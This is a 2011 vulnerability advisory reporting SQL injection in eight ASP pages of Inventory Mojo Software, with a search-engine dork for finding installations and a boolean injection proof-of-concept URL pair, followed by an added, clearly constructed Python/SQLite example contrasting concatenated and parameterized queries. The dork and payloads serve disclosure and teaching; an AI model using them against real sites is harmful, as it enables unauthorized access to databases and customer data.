Wednesday, March 23, 2011

Inventory Mojo Software Vulnerable to Multiple SQL Injections


Title : Inventory Mojo Software Vulnerable to Multiple SQL Injections
Found by : p0pc0rn
Dork : intext:"Powered by Inventory Mojo Software."

SQL
---
Pages with vulnerable parameters, grouped by request method:

Method = GET
------------
categoria.asp
producto.asp
srubro.asp
marca.asp

Method = POST
-------------
buscar.asp
Login.asp
NewUser.asp
do_addToNewsletter.asp

POC
---
http://site.com/categoria.asp?CT=6' and '1'='1 TRUE
http://site.com/categoria.asp?CT=6' and '1'='0 FALSE

thanks,
-p0pc0rn-
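
Why the TRUE/FALSE pair in the POC is conclusive, and what the fix looks like, shown as an added example that is not part of the original advisory or the vendor's code. The advisory does not show the query, so this assumes CT is concatenated into a quoted literal; the Python/SQLite table, its names and its rows are constructed.

```python
import sqlite3

def make_db():
    # Constructed sample catalogue; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE productos (id INTEGER, categoria TEXT, nombre TEXT)")
    db.executemany("INSERT INTO productos VALUES (?, ?, ?)",
                   [(1, "6", "widget"), (2, "6", "gadget"), (3, "7", "gizmo")])
    return db

def vulnerable_lookup(db, ct):
    # Assumed flaw: the CT value is concatenated into a quoted SQL literal,
    # so a quote in the input ends the literal and the rest runs as SQL.
    sql = "SELECT nombre FROM productos WHERE categoria = '" + ct + "' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def hardened_lookup(db, ct):
    # The value is bound as a parameter and is only ever compared as data.
    sql = "SELECT nombre FROM productos WHERE categoria = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (ct,))]

def validated_lookup(db, ct):
    # Defence in depth: CT is a category id, so reject anything non-numeric.
    if not (ct.isascii() and ct.isdigit()):
        raise ValueError("CT must be a numeric category id")
    return hardened_lookup(db, ct)

def is_boolean_oracle(lookup, db):
    # Regression check using the advisory's TRUE/FALSE pair: the lookup is
    # injectable in this way if the two requests produce different results.
    return lookup(db, "6' and '1'='1") != lookup(db, "6' and '1'='0")

if __name__ == "__main__":
    db = make_db()
    print("concatenated query is an oracle:", is_boolean_oracle(vulnerable_lookup, db))
    print("bound parameter is an oracle:  ", is_boolean_oracle(hardened_lookup, db))
```

In the ASP pages themselves the equivalent fix is an ADODB.Command with bound parameters in place of string-built SQL, applied to every page listed above.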